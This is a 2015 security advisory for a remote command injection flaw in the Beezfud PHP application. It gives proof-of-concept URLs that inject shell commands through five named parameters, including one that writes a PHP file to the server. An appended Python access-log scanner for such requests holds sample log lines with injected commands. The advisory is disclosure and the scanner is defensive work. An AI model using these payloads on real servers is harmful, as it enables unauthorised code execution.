================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest

Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo(); ?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
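
Added example (not part of the original advisory or of the beezfud project): a web access log check that flags requests to index.php in which one of the five listed parameters carries shell metacharacters after URL-decoding. The log lines are constructed, and both the combined log format and the rule that legitimate values never contain these characters are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameter names the advisory lists as vulnerable.
WATCHED = {"lookback", "max", "range", "latest", "earliest"}
# Characters that let a value break out of a shell command line.
# Assumption: legitimate values for these parameters never contain them.
SHELL_META = re.compile(r"[;|&`$<>\n\r]")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan(lines, path_suffix="/index.php"):
    """Return (line_no, parameter, decoded_value) for each suspicious hit."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(path_suffix):
            continue
        # Split on '&' only, so a raw ';' stays inside the value.
        for pair in url.query.split("&"):
            raw_name, _, raw_value = pair.partition("=")
            name, value = unquote_plus(raw_name), unquote_plus(raw_value)
            if name in WATCHED and SHELL_META.search(value):
                hits.append((no, name, value))
    return hits


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/Dec/2015:10:00:01 +0000] '
    '"GET /beezfud/index.php?lookback=7&max=50 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/Dec/2015:10:02:13 +0000] '
    '"GET /beezfud/index.php?lookback=%3Bid%3B HTTP/1.1" 200 5301',
    '192.0.2.44 - - [23/Dec/2015:10:02:40 +0000] '
    '"GET /beezfud/index.php?range=1;uname HTTP/1.1" 200 5290',
    '192.0.2.10 - - [23/Dec/2015:10:05:00 +0000] '
    '"GET /beezfud/about.php?max=;x; HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for line_no, param, value in scan(SAMPLE):
        print(f"line {line_no}: {param}={value!r}")
```

Only GET query strings are visible in an access log; values sent in a POST body would need application-level or WAF logging to inspect.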